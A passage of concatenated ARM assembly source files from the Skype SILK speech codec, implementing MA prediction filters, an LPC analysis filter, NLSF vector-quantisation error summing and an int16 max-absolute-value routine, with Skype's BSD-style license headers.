bne LR(9, f)/*MA_Prediction_ORDER_2BYTE*/
ands r6, ma_order, #1
bne LR(9, f)/*MA_Prediction_ORDER_2BYTE*/
cmp ma_order, #6
blt LR(9, f)/*MA_Prediction_ORDER_2BYTE*/
// order % 2 == 0
str r0, [sp, #SAVE_IN]
str r1, [sp, #SAVE_B]
str r2, [sp, #SAVE_S]
str r3, [sp, #SAVE_OUT]
mov ma_in, r0
mov ma_out, r3
L(0)
ldr ma_s, [sp, #SAVE_S]
ldr ma_b, [sp, #SAVE_B]
ldrsh ma_in_val, [ma_in], #2
ldr ma_s0_val, [ma_s], #4
ldr ma_order, [sp, #arg_order]
ldr ma_s1_val, [ma_s], #4
rsb ma_tmp0, ma_s0_val, ma_in_val, lsl #12
ldr ma_b_val, [ma_b], #4
qadd ma_out_val, ma_tmp0, ma_tmp0
sub ma_order, ma_order, #4
mov ma_const0, #32768
qadd ma_out_val, ma_out_val, ma_out_val
qadd ma_out_val, ma_out_val, ma_out_val
qadd ma_out_val, ma_out_val, ma_out_val
qadd ma_out_val, ma_out_val, ma_const0
ldr ma_s2_val, [ma_s], #4
mov ma_out_val, ma_out_val, asr #16
strh ma_out_val, [ma_out], #2
sub r1, ma_s, #12
L(1)
smlabb ma_new_s1, ma_in_val, ma_b_val, ma_s1_val
smlabt ma_new_s2, ma_in_val, ma_b_val, ma_s2_val
ldmia ma_s!, {ma_s1_val, ma_s2_val}
ldr ma_b_val, [ma_b], #4
subs ma_order, ma_order, #2
stmia r1!, {ma_new_s1, ma_new_s2}
bgt LR(1, b)
smlabb ma_new_s1, ma_in_val, ma_b_val, ma_s1_val
smlabt ma_new_s2, ma_in_val, ma_b_val, ma_s2_val
ldr ma_s1_val, [ma_s], #-12
ldr ma_b_val, [ma_b]
str ma_new_s1, [ma_s], #4
str ma_new_s2, [ma_s], #4
smlabb ma_new_s1, ma_in_val, ma_b_val, ma_s1_val
smulbt ma_new_s2, ma_in_val, ma_b_val
subs ma_len, ma_len, #1
str ma_new_s1, [ma_s], #4
str ma_new_s2, [ma_s]
bgt LR(0, b)
add sp, sp, #16
ldmia sp!, {r4-r10, fp, ip, pc}
VARDEF ma1_in, r6
VARDEF ma1_out, sb
VARDEF ma1_s0_val, lr
VARDEF ma1_b, _r7
VARDEF ma1_s, r8
VARDEF ma1_b_val, r2
VARDEF ma1_s1_val, r3
VARDEF ma1_b0_val, r1
VARDEF ma1_s2_val, r2
// order % 2 != 0
/*MA_Prediction_ORDER_2BYTE: */
L(9)
add r2, r2, #4
str r0, [sp, #SAVE_IN]
str r1, [sp, #SAVE_B]
str r2, [sp, #SAVE_S]
str r3, [sp, #SAVE_OUT]
mov ma1_in, r0
mov ma1_out, r3
ldr ma1_s0_val, [r2, #-4]
L(0)
ldrsh ma_in_val, [ma1_in], #2
ldr ma_order, [sp, #arg_order]
ldr ma1_b, [sp, #SAVE_B]
ldr ma1_s, [sp, #SAVE_S]
rsb ma_out_val, ma1_s0_val, ma_in_val, lsl #12
ldrsh ma1_b_val, [ma1_b], #2
qadd ma_out_val, ma_out_val, ma_out_val
ldr ma1_s1_val, [ma1_s]
qadd ma_out_val, ma_out_val, ma_out_val
smlabb ma1_s0_val, ma_in_val, ma1_b_val, ma1_s1_val
mov ma1_s1_val, #32768
qadd ma_out_val, ma_out_val, ma_out_val
qadd ma_out_val, ma_out_val, ma_out_val
qadd ma_out_val, ma_out_val, ma1_s1_val
mov ma_out_val, ma_out_val, asr #16
sub ma_order, ma_order, #3
ldr ma1_s1_val, [ma1_s, #4]
strh ma_out_val, [ma1_out], #2
ldrsh ma1_b0_val, [ma1_b], #2
L(1)
smlabb ma1_s2_val, ma_in_val, ma1_b0_val, ma1_s1_val
ldr ma1_s1_val, [ma1_s, #8]
ldrsh ma1_b0_val, [ma1_b], #2
str ma1_s2_val, [ma1_s], #4
subs ma_order, ma_order, #1
bgt LR(1, b)
smlabb ma1_s2_val, ma_in_val, ma1_b0_val, ma1_s1_val
ldrsh ma1_b0_val, [ma1_b], #2
str ma1_s2_val, [ma1_s], #4
smulbb ma1_s2_val, ma_in_val, ma1_b0_val
subs ma_len, ma_len, #1
str ma1_s2_val, [ma1_s]
bgt LR(0, b)
ldr r2, [sp, #SAVE_S]
str ma1_s0_val, [r2, #-4]
add sp, sp, #16
ldmia sp!, {r4-r10, fp, ip, pc}
/*
* void SKP_Silk_MA_Prediction_Q13(
* const SKP_int16 *in, I: input signal
* const SKP_int16 *B, I: MA coefficients, Q13 [order+1]
* SKP_int32 *S, I/O: state vector [order]
* SKP_int16 *out, O: output signal
* const SKP_int32 len, I: signal length
* const SKP_int32 order I: filter order
* )
*
*
*/
VARDEF maq13_s, ip
VARDEF maq13_b, lr
VARDEF maq13_in, sb
VARDEF maq13_out, sl
VARDEF maq13_in_val, r0
VARDEF maq13_out_val, r1
VARDEF maq13_order, r5
VARDEF maq13_len, r4
VARDEF maq13_s1, r1
VARDEF maq13_s2, r2
VARDEF maq13_s3, r3
VARDEF maq13_b1, r6
VARDEF maq13_s1_new, _r7
VARDEF maq13_s2_new, r8
.set SAVE_IN, 0
.set SAVE_B, 4
.set SAVE_S, 8
.set SAVE_OUT, 12
.globl SYM(SKP_Silk_MA_Prediction_Q13)
SYM(SKP_Silk_MA_Prediction_Q13):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #16
.set arg_len, 56
.set arg_order, 60
/*LOAD INPUT ARGS*/
ldr maq13_order, [sp, #arg_order]
ldr maq13_len, [sp, #arg_len]
ands _r7, r1, #3
bne LR(2, f)/*MA_Prediction_Q13_ORDER_2BYTE*/
ands r6, r5, #1
bne LR(2, f)/*MA_Prediction_Q13_ORDER_2BYTE*/
cmp r5, #6
blt LR(2, f)/*MA_Prediction_Q13_ORDER_2BYTE*/
// order % 2 == 0
str r0, [sp, #SAVE_IN]
str r1, [sp, #SAVE_B]
str r2, [sp, #SAVE_S]
str r3, [sp, #SAVE_OUT]
mov maq13_in, r0
mov maq13_out, r3
L(0)
ldr maq13_s, [sp, #SAVE_S]
ldr maq13_b, [sp, #SAVE_B]
ldrsh maq13_in_val, [maq13_in], #2
ldr maq13_s1, [maq13_s], #4
ldr maq13_order, [sp, #arg_order]
ldr maq13_s2, [maq13_s], #4
rsb maq13_s3, maq13_s1, maq13_in_val, lsl #13
ldr maq13_b1, [maq13_b], #4
qadd maq13_out_val, maq13_s3, maq13_s3
sub maq13_order, maq13_order, #4
mov r3, #32768
qadd maq13_out_val, maq13_out_val, maq13_out_val
qadd maq13_out_val, maq13_out_val, maq13_out_val
qadd maq13_out_val, maq13_out_val, r3
ldr maq13_s3, [maq13_s], #4
mov maq13_out_val, maq13_out_val, asr #16
strh maq13_out_val, [maq13_out], #2
L(1)
smlabb maq13_s1_new, maq13_in_val, maq13_b1, maq13_s2
smlabt maq13_s2_new, maq13_in_val, maq13_b1, maq13_s3
ldr maq13_s2, [maq13_s], #4
ldr maq13_s3, [maq13_s], #-16
ldr maq13_b1, [maq13_b], #4
subs maq13_order, maq13_order, #2
str maq13_s1_new, [maq13_s], #4
str maq13_s2_new, [maq13_s], #16
bgt LR(1, b)
smlabb maq13_s1_new, maq13_in_val, maq13_b1, maq13_s2
smlabt maq13_s2_new, maq13_in_val, maq13_b1, maq13_s3
ldr maq13_s2, [maq13_s], #-12
ldr maq13_b1, [maq13_b]
str maq13_s1_new, [maq13_s], #4
str maq13_s2_new, [maq13_s], #4
smlabb maq13_s1_new, maq13_in_val, maq13_b1, maq13_s2
smulbt maq13_s2_new, maq13_in_val, maq13_b1
subs maq13_len, maq13_len, #1
str maq13_s1_new, [maq13_s], #4
str maq13_s2_new, [maq13_s]
bgt LR(0, b)
add sp, sp, #16
ldmia sp!, {r4-r10, fp, ip, pc}
VARDEF ma1q13_s, r8
VARDEF ma1q13_b, _r7
VARDEF ma1q13_in, r6
VARDEF ma1q13_out, sb
VARDEF ma1q13_s1, r3
VARDEF ma1q13_s0, r2
VARDEF ma1q13_b1, r1
VARDEF ma1q13_b_tmp, r2
// order % 2 != 0
/*MA_Prediction_Q13_ORDER_2BYTE: */
L(2)
add r2, r2, #4
str r0, [sp, #SAVE_IN]
str r1, [sp, #SAVE_B]
str r2, [sp, #SAVE_S]
str r3, [sp, #SAVE_OUT]
mov ma1q13_in, r0
mov ma1q13_out, r3
ldr lr, [r2, #-4]
L(0)
ldrsh maq13_in_val, [ma1q13_in], #2
ldr maq13_order, [sp, #arg_order]
ldr ma1q13_b, [sp, #SAVE_B]
ldr ma1q13_s, [sp, #SAVE_S]
rsb maq13_out_val, lr, maq13_in_val, lsl #13
ldrsh ma1q13_b_tmp, [ma1q13_b], #2
qadd maq13_out_val, maq13_out_val, maq13_out_val
ldr ma1q13_s1, [ma1q13_s]
qadd maq13_out_val, maq13_out_val, maq13_out_val
smlabb lr, maq13_in_val, ma1q13_b_tmp, ma1q13_s1
mov r3, #32768
qadd maq13_out_val, maq13_out_val, maq13_out_val
qadd maq13_out_val, maq13_out_val, r3
mov maq13_out_val, maq13_out_val, asr #16
sub maq13_order, maq13_order, #3
ldr ma1q13_s1, [ma1q13_s, #4]
strh maq13_out_val, [sb], #2
ldrsh ma1q13_b1, [ma1q13_b], #2
L(1)
smlabb ma1q13_s0, maq13_in_val, ma1q13_b1, ma1q13_s1
ldr ma1q13_s1, [ma1q13_s, #8]
ldrsh ma1q13_b1, [ma1q13_b], #2
str ma1q13_s0, [ma1q13_s], #4
subs maq13_order, maq13_order, #1
bgt LR(1, b)
smlabb ma1q13_s0, maq13_in_val, ma1q13_b1, ma1q13_s1
ldrsh ma1q13_b1, [ma1q13_b], #2
str ma1q13_s0, [ma1q13_s], #4
smulbb ma1q13_s0, maq13_in_val, ma1q13_b1
subs maq13_len, maq13_len, #1
str ma1q13_s0, [ma1q13_s]
bgt LR(0, b)
ldr r2, [sp, #SAVE_S]
str lr, [r2, #-4]
add sp, sp, #16
ldmia sp!, {r4-r10, fp, ip, pc}
#endif
#if EMBEDDED_ARM>=5
#define SKP_Silk_MAX_ORDER_LPC 16
.set sp_B, 0
.set sp_pin, 32
.set sp_pB, 36
.set sp_pS, 40
.set sp_pout, 44
.globl SYM(SKP_Silk_LPC_analysis_filter)
SYM(SKP_Silk_LPC_analysis_filter):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #48
.set arg_len, 88
.set arg_Order, 92
VARDEF len, r4
VARDEF order, r5
VARDEF S_val, r6
VARDEF B_val, _r7
VARDEF S_tmp1, r8
VARDEF S_tmp2, sb
VARDEF out32, sl
// Registers not used in main inner loop
VARDEF in, r6
VARDEF in_Q12, _r7
VARDEF B_tmp, r6
VARDEF pB_tmp, _r7
str r0, [sp, #sp_pin]
str r1, [sp, #sp_pB]
str r2, [sp, #sp_pS]
str r3, [sp, #sp_pout]
ldr len, [sp, #arg_len]
ldr order, [sp, #arg_Order]
/*B_ALIGNMENT:*/
tst r1, #0x3
beq LR(3, f)/*S_ALIGNMENT*/
ldrh B_tmp, [r1], #2
add pB_tmp, sp, #sp_B
sub order, order, #1
L(0)
subs order, order, #1
strh B_tmp, [pB_tmp]
ldrh B_tmp, [r1], #2
bgt LR(0, b)
ldr order, [sp, #arg_Order]
strh B_tmp, [pB_tmp]
add r1, sp, #sp_B //R1 aligned pointer to B.
/*S_ALIGNMENT:*/
L(3)
tst r2, #0x3
bne LR(4, f)/*MAIN_FORLOOP1*/
/*MAIN_FORLOOP0: */
L(0)
mov out32, #0
ldr order, [sp, #arg_Order]
/*MAIN_INNER_FORLOOP0:*/
ldr S_val, [r2], #2
ldr B_val, [r1], #4
sub order, order, #4
mov S_tmp2, S_val, lsr #16
strh S_val, [r2], #2
SKP_SMLAD out32, B_val, S_val, out32
ldr S_val, [r2]
L(1)
ldr B_val, [r1], #4
add S_tmp2, S_tmp2, S_val, lsl #16
ldr S_tmp1, [r2, #4]
subs order, order, #2
str S_tmp2, [r2], #4
SKP_SMLAD out32, B_val, S_val, out32
mov S_tmp2, S_val, lsr #16
mov S_val, S_tmp1
bgt LR(1, b)
ldr B_val, [r1]
add S_tmp2, S_tmp2, S_val, lsl #16
SKP_SMLAD out32, B_val, S_val, out32
str S_tmp2, [r2]
ldrsh in, [r0], #2
ldr r2, [sp, #sp_pS]
ldr r1, [sp, #sp_pB]
mov in_Q12, in, lsl #12
qsub out32, in_Q12, out32
mov out32, out32, asr #11
strh in, [r2]
add out32, out32, #1
#if EMBEDDED_ARM >=6
ssat out32, #16, out32, asr #1
#else
mov out32, out32, asr #1
cmp out32, #0x8000
mvnge out32, #0x8000
subge out32, out32, #1
cmn out32, #0x8000
movlt out32, #0x8000
#endif
subs len, len, #1
strh out32, [r3], #2
bgt LR(0, b)
add sp, sp, #48
ldmia sp!, {r4-r10, fp, ip, pc}
/*MAIN_FORLOOP1: //pS&3!=0*/
L(4)
L(0)
mov out32, #0
ldr order, [sp, #arg_Order]
/*MAIN_INNER_FORLOOP1:*/
ldrh S_val, [r2], #2
ldr S_tmp1, [r2]
ldr S_tmp2, [r2, #4]
ldr B_val, [r1], #4
sub order, order, #4
add S_val, S_val, S_tmp1, lsl #16
mov S_tmp1, S_tmp1, lsr #16
str S_val, [r2], #4
SKP_SMLAD out32, B_val, S_val, out32
L(1)
ldr B_val, [r1], #4
add S_val, S_tmp1, S_tmp2, lsl #16
mov S_tmp1, S_tmp2, lsr #16
subs order, order, #2
#ifdef _WINRT
ble LR(2, f)
ldr S_tmp2, [r2, #4]
L(2)
#else
ldrgt S_tmp2, [r2, #4]
#endif
str S_val, [r2], #4
SKP_SMLAD out32, B_val, S_val, out32
bgt LR(1, b)
ldrsh S_tmp2, [r2]
ldr B_val, [r1]
add S_val, S_tmp1, S_tmp2, lsl #16
SKP_SMLAD out32, B_val, S_val, out32
strh S_val, [r2]
ldrsh in, [r0], #2
ldr r2, [sp, #sp_pS]
ldr r1, [sp, #sp_pB]
mov in_Q12, in, lsl #12
qsub out32, in_Q12, out32
mov out32, out32, asr #11
strh in, [r2]
add out32, out32, #1
#if EMBEDDED_ARM >=6
ssat out32, #16, out32, asr #1
#else
mov out32, out32, asr #1
cmp out32, #0x8000
mvnge out32, #0x8000
subge out32, out32, #1
cmn out32, #0x8000
movlt out32, #0x8000
#endif
subs len, len, #1
strh out32, [r3], #2
bgt LR(0, b)
add sp, sp, #48
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 5,057 | silk/src/SKP_Silk_NLSF_VQ_sum_error_FIX_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if __arm__
#include "SKP_Silk_AsmPreproc.h"
#if ( EMBEDDED_ARM >= 6 )
VARDEF val_N, r4
VARDEF val_K, r5
VARDEF val_order, r6
VARDEF val_in_Q15, _r7
VARDEF val_cb_Q15, r8
VARDEF val_wtmp_Q6, sb
VARDEF val_sum_error, sl
VARDEF val_diff, ip
VARDEF val_tmp, lr
VARDEF val_in_Q15_tmp, ip
VARDEF val_wtmp_Q6_tmp, lr
VARDEF ptr_wtmp, _r7
VARDEF val0_wtmp, sb
VARDEF val1_wtmp, r5
VARDEF val2_wtmp, r8
VARDEF ptr_err_Q20, r0
VARDEF ptr_in_Q15, r1
VARDEF ptr_w_Q6, r2
VARDEF ptr_pCB_Q15, r3
.set sp_wtmp, 0
.set sp_err_Q20, 32
.set sp_in_Q15, 36
.set sp_w_Q6, 40
.set sp_pCB_Q15, 44
.globl SYM(SKP_Silk_NLSF_VQ_sum_error_FIX)
SYM(SKP_Silk_NLSF_VQ_sum_error_FIX):
stmdb sp!, {r4-r10, fp, ip, lr}
add fp, sp, #36
sub sp, sp, #48
.set ptr_N, 88
.set ptr_K, 92
.set ptr_LPC_order, 96
str r0, [sp, #sp_err_Q20]
str r1, [sp, #sp_in_Q15]
str r2, [sp, #sp_w_Q6]
str r3, [sp, #sp_pCB_Q15]
ldr val_N, [sp, #ptr_N]
ldr val_order, [sp, #ptr_LPC_order]
ldr val1_wtmp, [r2], #4
ldr val2_wtmp, [r2], #4
sub val_order, val_order, #2
add ptr_wtmp, sp, #sp_wtmp
L(3)
pkhbt val0_wtmp, val1_wtmp, val2_wtmp, lsl #16
subs val_order, val_order, #2
ldr val1_wtmp, [r2], #4
ldr val2_wtmp, [r2], #4
str val0_wtmp, [ptr_wtmp], #4
bgt LR(3, b)
pkhbt val0_wtmp, val1_wtmp, val2_wtmp, lsl #16
str val0_wtmp, [ptr_wtmp], #4
ands val_tmp, ptr_pCB_Q15, #3
bgt LR(4, f)
/*OUTTER_LOOP*/
L(2)
ldr ptr_pCB_Q15, [sp, #sp_pCB_Q15]
ldr val_K, [sp, #ptr_K]
/*MIDDLE_LOOP*/
L(1)
ldr ptr_in_Q15, [sp, #sp_in_Q15]
add ptr_w_Q6, sp, #sp_wtmp
ldr val_order, [sp, #ptr_LPC_order]
mov val_sum_error, #0
/*INNER_LOOP*/
L(0)
ldmia ptr_in_Q15!, {val_in_Q15, val_in_Q15_tmp}
ldr val_wtmp_Q6, [ptr_w_Q6], #4
ldr val_cb_Q15, [ptr_pCB_Q15], #4
subs val_order, val_order, #2
pkhbt val_in_Q15, val_in_Q15, val_in_Q15_tmp, lsl #16
ssub16 val_diff, val_in_Q15, val_cb_Q15
smulbb val_tmp, val_diff, val_diff
smultt val_diff, val_diff, val_diff
smlawb val_sum_error, val_tmp, val_wtmp_Q6, val_sum_error
smlawt val_sum_error, val_diff, val_wtmp_Q6, val_sum_error
bgt LR(0, b)
subs val_K, val_K, #1
str val_sum_error, [ptr_err_Q20], #4
bgt LR(1, b)
subs val_N, val_N, #1
str ptr_in_Q15, [sp, #sp_in_Q15]
bgt LR(2, b)
add sp, sp, #48
ldmia sp!, {r4-r10, fp, ip, pc}
L(4)
ldr ptr_pCB_Q15, [sp, #sp_pCB_Q15]
ldr val_K, [sp, #ptr_K]
/*MIDDLE_LOOP*/
L(1)
ldr ptr_in_Q15, [sp, #sp_in_Q15]
add ptr_w_Q6, sp, #sp_wtmp
ldr val_order, [sp, #ptr_LPC_order]
mov val_sum_error, #0
/*INNER_LOOP*/
L(0)
ldmia ptr_in_Q15!, {val_in_Q15, val_in_Q15_tmp}
ldr val_wtmp_Q6, [ptr_w_Q6], #4
ldrh val_cb_Q15, [ptr_pCB_Q15], #2
ldrh val_tmp, [ptr_pCB_Q15], #2
subs val_order, val_order, #2
pkhbt val_in_Q15, val_in_Q15, val_in_Q15_tmp, lsl #16
pkhbt val_cb_Q15, val_cb_Q15, val_tmp, lsl #16
ssub16 val_diff, val_in_Q15, val_cb_Q15
smulbb val_tmp, val_diff, val_diff
smultt val_diff, val_diff, val_diff
smlawb val_sum_error, val_tmp, val_wtmp_Q6, val_sum_error
smlawt val_sum_error, val_diff, val_wtmp_Q6, val_sum_error
bgt LR(0, b)
subs val_K, val_K, #1
str val_sum_error, [ptr_err_Q20], #4
bgt LR(1, b)
subs val_N, val_N, #1
str ptr_in_Q15, [sp, #sp_in_Q15]
bgt LR(4, b)
add sp, sp, #48
ldmia sp!, {r4-r10, fp, ip, pc}
END
#endif
#endif
|
open-vela/external_silk-v3-decoder | 8,030 | silk/src/SKP_Silk_array_maxabs_arm.S | /***********************************************************************
Copyright (c) 2006-2012, Skype Limited. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, (subject to the limitations in the disclaimer below)
are permitted provided that the following conditions are met:
- Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Skype Limited, nor the names of specific
contributors, may be used to endorse or promote products derived from
this software without specific prior written permission.
NO EXPRESS OR IMPLIED LICENSES TO ANY PARTY'S PATENT RIGHTS ARE GRANTED
BY THIS LICENSE. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
CONTRIBUTORS ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF
USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
***********************************************************************/
#if defined(__arm__)
#include "SKP_Silk_AsmPreproc.h"
#if EMBEDDED_ARM>=5
VARDEF ptr_vec, r0
VARDEF val_vec, r2
VARDEF val_return, r0
VARDEF len, r1
VARDEF val1_max, r3
VARDEF val2_max, r4
VARDEF val_lvl, r5
VARDEF val_ind, r6
VARDEF const_int16_MAX, r5
.globl SYM(SKP_Silk_int16_array_maxabs)
SYM(SKP_Silk_int16_array_maxabs):
stmdb sp!, {r4-r6, fp, ip, lr}
add fp, sp, #20
cmp r1, #6
mvn r5, #0 /*r5 = -1(max)*/
blt LR(7, f)
ands r2, r0, #3
bne LR(3, f)
ands r2, r1, #0x1
bne LR(1, f)
ldr val_vec, [ptr_vec], #4
sub len, len, #2
L(0)
smulbb val1_max, val_vec, val_vec
smultt val2_max, val_vec, val_vec
ldr val_vec, [ptr_vec], #4
cmp val1_max, r5
movge val_lvl, val1_max
#ifdef _WINRT
subge val_ind, ptr_vec, #4 /*address*/
subge val_ind, val_ind, #4 /*address*/
#else
subge val_ind, ptr_vec, #8 /*address*/
#endif
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #6
subs len, len, #2
bgt LR(0, b)
smulbb val1_max, val_vec, val_vec
smultt val2_max, val_vec, val_vec
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #4 /*address*/
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #2
b LR(9, f)
/*Odd number of iterations*/
L(1)
ldr val_vec, [ptr_vec], #4
sub len, len, #3
L(2)
smulbb val1_max, val_vec, val_vec
smultt val2_max, val_vec, val_vec
ldr val_vec, [ptr_vec], #4
cmp val1_max, val_lvl
movge val_lvl, val1_max
#ifdef _WINRT
subge val_ind, ptr_vec, #4 /*address*/
subge val_ind, val_ind, #4 /*address*/
#else
subge val_ind, ptr_vec, #8 /*address*/
#endif
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #6
subs len, len, #2
bgt LR(2, b)
smulbb val1_max, val_vec, val_vec
smultt val2_max, val_vec, val_vec
ldrsh val_vec, [ptr_vec], #2
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #6 /*address*/
smulbb val1_max, val_vec, val_vec
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #4
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #2 /*address*/
b LR(9, f)
/*Oddly aligned*/
L(3)
ands r2, r1, #0x1
bne LR(5, f)
ldrsh val_vec, [ptr_vec], #2
smulbb val1_max, val_vec, val_vec
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #2
ldr val_vec, [ptr_vec], #4
sub len, len, #4
L(4)
smulbb val1_max, val_vec, val_vec
smultt val2_max, val_vec, val_vec
ldr val_vec, [ptr_vec], #4
cmp val1_max, val_lvl
movge val_lvl, val1_max
#ifdef _WINRT
subge val_ind, ptr_vec, #4 /*address*/
subge val_ind, val_ind, #4 /*address*/
#else
subge val_ind, ptr_vec, #8 /*address*/
#endif
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #6
subs len, len, #2
bgt LR(4, b)
smulbb val1_max, val_vec, val_vec
smultt val2_max, val_vec, val_vec
ldrsh val_vec, [ptr_vec], #2
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #6 /*address*/
smulbb val1_max, val_vec, val_vec
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #4
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #2 /*address*/
b LR(9, f)
/*Odd number of iterations+Oddly aligned*/
L(5)
ldrsh val_vec, [ptr_vec], #2
smulbb val1_max, val_vec, val_vec
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #2
ldr val_vec, [ptr_vec], #4
sub len, len, #3
L(6)
smulbb val1_max, val_vec, val_vec
smultt val2_max, val_vec, val_vec
ldr val_vec, [ptr_vec], #4
cmp val1_max, val_lvl
movge val_lvl, val1_max
#ifdef _WINRT
subge val_ind, ptr_vec, #4 /*address*/
subge val_ind, val_ind, #4 /*address*/
#else
subge val_ind, ptr_vec, #8 /*address*/
#endif
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #6
subs len, len, #2
bgt LR(6, b)
smulbb val1_max, val_vec, val_vec
smultt val2_max, val_vec, val_vec
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #4 /*address*/
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #2
b LR(9, f)
/*Less than 6 iterations*/
L(7)
ldrsh val_vec, [ptr_vec], #2
sub len, len, #1
L(8)
smulbb val1_max, val_vec, val_vec
ldrsh val_vec, [ptr_vec], #2
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #4
subs len, len, #1
bgt LR(8, b)
smulbb val1_max, val_vec, val_vec
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #2
L(9)
ldrsh val_return, [val_ind]
mvn const_int16_MAX, #0x80000000
mov const_int16_MAX, const_int16_MAX, asr #16
cmp val_return, #0
rsblt val_return, val_return, #0
cmp val_return, const_int16_MAX
movge val_return, const_int16_MAX
ldmia sp!, {r4-r6, fp, ip, pc}
#elif EMBEDDED_ARM>=4
VARDEF ptr_vec, r0
VARDEF val1_vec, r2
VARDEF val2_vec, r7
VARDEF len, r1
VARDEF val1_max, r3
VARDEF val2_max, r8
VARDEF val_lvl, r5
VARDEF val_ind, r6
VARDEF val_return, r0
VARDEF const_int16_MAX, r5
.globl SYM(SKP_Silk_int16_array_maxabs)
SYM(SKP_Silk_int16_array_maxabs):
stmdb sp!, {r4-r8, fp, ip, lr}
add fp, sp, #28
mvn val_lvl, #0 /*r5 = -1(max)*/
ldrsh val1_vec, [ptr_vec], #2
ldrsh val2_vec, [ptr_vec], #2
sub len, len, #2
L(0)
mul val1_max, val1_vec, val1_vec
mul val2_max, val2_vec, val2_vec
ldrsh val1_vec, [ptr_vec], #2
ldrsh val2_vec, [ptr_vec], #2
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #8
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #6
subs len, len, #2
bgt LR(0, b)
mul val1_max, val1_vec, val1_vec
mul val2_max, val2_vec, val2_vec
cmp val1_max, val_lvl
movge val_lvl, val1_max
subge val_ind, ptr_vec, #4
cmn len, #1 /*r1?=-1*/
beq LR(1, f)
cmp val2_max, val_lvl
movge val_lvl, val2_max
subge val_ind, ptr_vec, #2
L(1)
ldrsh val_return, [val_ind]
mvn const_int16_MAX, #0x80000000
mov const_int16_MAX, const_int16_MAX, asr #16
cmp val_return, #0
rsblt val_return, val_return, #0
cmp val_return, const_int16_MAX
movge val_return, const_int16_MAX
ldmia sp!, {r4-r8, fp, ip, pc}
#endif
END
#endif
|
